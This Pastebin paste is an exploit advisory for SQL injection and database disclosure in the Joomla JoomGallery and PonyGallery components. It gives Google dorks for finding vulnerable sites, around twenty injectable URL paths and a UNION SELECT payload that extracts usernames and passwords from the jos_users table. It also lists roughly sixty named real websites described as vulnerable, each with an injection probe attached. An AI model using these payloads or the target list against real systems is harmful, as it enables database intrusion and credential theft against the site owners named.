Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla JoomGallery 3.2.2 PonyGallery 2.5.1 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/02/2019
- # Vendor Homepage : joomlander.net - joomlacode.org
- # Software Download Link : github.com/JoomGallery/JoomGallery/archive/master.zip
- adyawinsa.com/index.php/remository?func=fileinfo&id=2
- github.com/JoomGallery/JoomGallery
- # Software Information Link : en.joomgallery.net/faq/general-faq/migration-and-update-to-joomgallery-15.html
- en.joomgallery.net/demo/faq/general-faq/from-ponygallery-ml-in-joomla-1-5-89.html
- extensions.joomla.org/extension/photos-a-images/galleries/joomgallery/
- sourceforge.net/projects/pony-gallery/
- joomlacode.org/gf/project/ponygalleryrand/
- # Software Affected Versions : 3.3.0 3.2.2 for Joomla 3.x and previous versions.
- + PonyGallery 2.5.1 ML for Joomla 1.5 - PonyGallery v1.0.x extension
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_ponygallery''
- inurl:''/index.php?option=com_joomgallery''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- # Old Similar CVE [ Only Version and Parameters are different ] : CVE-2007-4046
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- JoomGallery is a gallery component completely integrated into Joomla!, with support for Joomla! 3.x
- Pony Gallery - Module displays one or more random Pony - Gallery images, sizable thumbnails or
- full-size, horizontal or vertical - orientation, with optional category and - author links.
- This Joomla extension/component moved to JoomlaCode.org 12/12/2007 from Joomlander.Net.
- Now JoomGallery and PonyGallery are presented together.
- ####################################################################
- # Impact :
- ***********
- * Joomla JoomGallery 3.2.2 PonyGallery 3.2.2 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- * This Software prone to an information exposure/database disclosure vulnerability.
- Successful exploits of this issue may allow an attacker to obtain sensitive
- information by downloading the full contents of the application's database.
- * Any remote user may download the database files and gain access
- to sensitive information including unencrypted authentication credentials.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_ponygallery&Itemid=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[SQL Injection]&func=special
- /index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection]&lang=dutch
- /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection]
- /index.php?option=com_ponygallery&Itemid=[ID-NUMBER]&func=special&sorting=lastcomment&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
- /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en
- /index.php?option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?view=detail&id=[SQL Injection]&option=com_joomgallery
- /index.php?format=feed&type=rss&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?view=image&format=raw&type=orig&id=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?view=image&format=raw&type=img&id=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?view=detail&id=[ID-NUMBER]&option=com_joomgallery&lang=en&Itemid=[SQL Injection]
- /index.php?view=category&catid=[ID-NUMBER]&option=com_joomgallery&Itemid=[ID-NUMBER]&page=[SQL Injection]
- /index.php?option=com_joomgallery&func=download&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]&lang=ru
- /index.php?option=com_joomgallery&catid=[ID-NUMBER]&lang=de&view=category&Itemid=[SQL Injection]&format=feed&type=atom
- /index.php?view=category&catid=[ID-NUMBER]&page=[ID-NUMBER]&catpage=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?view=category&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&option=com_joomgallery&Itemid=[SQL Injection]
- /index.php?option=com_joomgallery&func=viewcategory&catid=[ID-NUMBER]&startpage=[ID-NUMBER]&substartpage=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en#subcategory
- # Example SQL Injection Exploit Payload :
- *************************************
- %20union%20select%201,2,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,0,0%20from%20jos_users/*
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_joomgallery/sql/install.mysql.utf8.sql
- /administrator/components/com_joomgallery/sql/uninstall.mysql.utf8.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/2.0.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/2.1.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.0.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.1.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.2.0.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.2.1.sql
- /administrator/components/com_joomgallery/sql/updates/mysql/3.3.0.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] skhssco.org.mo/index.php?option=com_joomgallery&func=viewcategory&catid=113&startpage=1&substartpage=3&Itemid=5%27&lang=en
- [+] okokratt.ee/gamezone/index.php?option=com_joomgallery&func=viewcategory&catid=7&startpage=1&substartpage=1&Itemid=44%27&lang=en
- [+] cimbria.net/joomla/index.php?option=com_ponygallery&Itemid=38%27
- [+] kirchen-wiesbaden.de/kiwicms/index.php?option=com_ponygallery&Itemid=58&func=special&sorting=lastcomment&date=2018-11-01%27
- [+] 2007-2013.przedszkole-szarytki.pl/index.php?option=com_ponygallery&Itemid=2&func=viewcategory&catid=294%27
- [+] gimnazjum2013.gimnazjumrobakowo.ehost.pl/index.php?option=com_ponygallery&Itemid=40&func=detail&id=2842%27
- [+] cobur.nl/vp/nl/index.php?option=com_ponygallery&Itemid=77&func=detail&id=1457%27
- [+] fcppublicidade.com.br/fcppublicidadev02/index.php?option=com_ponygallery&func=detail&id=508%27
- [+] ijzervlechtbedrijfserdalbv.nl/nl/index.php?option=com_ponygallery&Itemid=34&func=viewcategory&catid=12%27&lang=dutch
- [+] przedszkole-elf.com/index.php?option=com_ponygallery&Itemid=11&func=detail&id=355%27
- [+] ijzervlechtbedrijfserdalbv.nl/nl/index.php?option=com_ponygallery&Itemid=34&func=viewcategory&catid=13%27
- [+] webo-airbrush.de/index.php?option=com_ponygallery&Itemid=26&func=viewcategory&catid=2%27
- [+] jettspandoeken.nl/nl/index.php?option=com_ponygallery&Itemid=34%27
- [+] spkowala.pl/index.php?option=com_ponygallery&Itemid=61%27&func=special
- [+] vanessa-tholen.de/index.php?option=com_ponygallery&Itemid=30&func=viewcategory&catid=1%27
- [+] dyadent.com.ec/index.php?option=com_ponygallery&Itemid=9&func=viewcategory&catid=7%27
- [+] ebea.at/bernd/cms/index.php?option=com_ponygallery&Itemid=4%27
- [+] planetacanino.com/index.php?option=com_ponygallery&Itemid=43%27
- [+] melly-web.de/content/index.php?option=com_ponygallery&Itemid=1%27
- [+] sanpedrolloc.awardspace.biz/index.php?option=com_ponygallery&Itemid=35%27
- [+] dsi.cba.pl/index.php?option=com_ponygallery&Itemid=26&func=detail&id=6132%27
- [+] hamazoor.ir/persian/index.php?option=com_ponygallery&Itemid=29&func=viewcategory&catid=123&startpage=1
- [+] braeuwiese.at/index.php?option=com_joomgallery&func=viewcategory&catid=2&Itemid=27%27
- [+] w-caspari.at/index.php/index.php?view=image&format=raw&type=orig&id=116&option=com_joomgallery&Itemid=69%27
- [+] mitennis.com/old/index.php?format=feed&type=rss&option=com_joomgallery&Itemid=82%27
- [+] tsg.myeasysolution.com/index.php?view=image&format=raw&type=orig&id=6&option=com_joomgallery&Itemid=52%27
- [+] bianchicaterina.it/public/index.php?view=category&catid=7&option=com_joomgallery&Itemid=112%27
- [+] parafiaotmuchow.pl/index.php?view=detail&id=227&option=com_joomgallery&Itemid=135%27
- [+] elivaniacosta.com.br/new/index.php?option=com_joomgallery&view=gallery&Itemid=74%27
- [+] templenoegaa.ie/index.php?view=category&catid=46&option=com_joomgallery&Itemid=53%27
- [+] swalestudio.com/anime/index.php?option=com_joomgallery&func=detail&id=1808&Itemid=2%27
- [+] bogorgreenforest.com/index.php?view=category&catid=4&option=com_joomgallery&Itemid=62%27
- [+] capitalbank.co.zw/index.php?view=category&catid=1&startpage=3&substartpage=1&option=com_joomgallery&Itemid=144%27
- [+] pinsk.pl/index.php?view=detail&id=52&option=com_joomgallery&Itemid=8%27
- [+] pazyna.pl/index.php?view=detail&id=171%27&option=com_joomgallery
- [+] arhiva.gcjelenac.com/index.php?option=com_joomgallery&Itemid=103&func=viewcategory&catid=4%27
- [+] comunidadconocimiento.com/versionanterior/index.php?option=com_joomgallery&func=detail&id=124&Itemid=58%27
- [+] gimnazjum51.poznan.pl/index.php?option=com_joomgallery&func=detail&id=11685&Itemid=8%27
- [+] artegrazia.it/arte/index.php?option=com_joomgallery&func=detail&id=123&Itemid=57%27
- [+] capitalbank.co.zw/index.php?view=image&format=raw&type=orig&id=15&option=com_joomgallery&Itemid=144%27
- [+] stefvangorp.be/pages/index.php?view=image&format=raw&type=orig&id=16&option=com_joomgallery&Itemid=110%27
- [+] qapsites.com.br/coophalis/index.php?view=category&catid=2&startpage=3&substartpage=1&option=com_joomgallery&Itemid=53%27
- [+] sedeelectronica.yunqueradehenares.com/index.php?option=com_joomgallery&Itemid=72%27
- [+] elivaniacosta.com.br/new/index.php?view=image&format=raw&type=img&id=166&option=com_joomgallery&Itemid=74%27
- [+] jennersdorf.gernots.at/index.php?view=category&catid=84&page=13&catpage=1&option=com_joomgallery&Itemid=811%27
- [+] petersmusikstudio.se/index.php?view=image&format=raw&type=orig&id=35&option=com_joomgallery&Itemid=57%27
- [+] lacel.cnt.br/site_/administrator/index.php?option=com_joomgallery&act=1%27=categories
- [+] zssvinov.cz/index.php?view=category&catid=69&option=com_joomgallery&Itemid=626%27
- [+] vs.eggersdorf.at/index.php?view=category&catid=1&option=com_joomgallery&Itemid=31%27
- [+] znkpomurje.com/old_joomla/index.php?view=category&catid=21&option=com_joomgallery&Itemid=63%27
- [+] kalcherhof.com/index.php?option=com_joomgallery&catid=6&lang=de&view=category&Itemid=201%27&format=feed&type=atom
- [+] apartmani-rakovic.com/index.php?view=category&catid=5&option=com_joomgallery&Itemid=69%27
- [+] tr.institutbuhara.com/index.php?option=com_joomgallery&Itemid=75%27
- [+] broprof.ru/burjated/index.php?option=com_joomgallery&func=download&catid=37&id=1601&Itemid=55%27&lang=ru
- [+] omaspumpkinpatch.com/index.php?option=com_joomgallery&func=detail&id=27&Itemid=67%27
- [+] rennrodeln-blankenburg.de/index.php?view=category&catid=5&option=com_joomgallery&Itemid=24%27
- [+] musikschule-gnas.at/cms2/index.php?view=category&catid=52&option=com_joomgallery&Itemid=510%27
- [+] hydrobiology-bg.com/index.php?view=detail&id=44&option=com_joomgallery&lang=en&Itemid=1%27
- [+] uralvelo.ru/index.php?view=category&catid=14&option=com_joomgallery&Itemid=91%27
- [+] rsc-gross-umstadt.de/index.php?view=category&catid=2&page=3&catpage=1&option=com_joomgallery&Itemid=61%27
- [+] skastudents.com/index.php?view=detail&id=88&option=com_joomgallery&Itemid=84%27
- [+] gartenfreunde-bondorf-gaeu.de/index.php?view=category&catid=2&option=com_joomgallery&Itemid=184&page=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Assigning the return value of new by reference is
- deprecated in /home/users/puhelf/public_html/includes/joomla.php on line 829
- Deprecated: Non-static method JSite::getMenu() should not be called statically,
- assuming $this from incompatible context in /home/doggymon/public_html
- /NJBalloon.com/components/com_joomgallery/views/detail/view.html.php on line 60
- No valid database connection You have an error in your SQL syntax;
- check the manual that corresponds to your MySQL server version for the
- right syntax to use near '-8,8' at line 17 SQL=SELECT *, a.owner AS owner,
- ROUND(imgvotesum/imgvotes, 2) AS rating FROM jos_joomgallery AS
- a LEFT JOIN jos_joomgallery_catg AS c ON c.cid=a.catid WHERE
- a.published = '1' AND a.catid = '113' AND a.approved = '1' AND
- c.access <= '0' ORDER BY a.imgdate ASC, a.imgdate ASC,
- a.imgdate ASC LIMIT -8,8
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement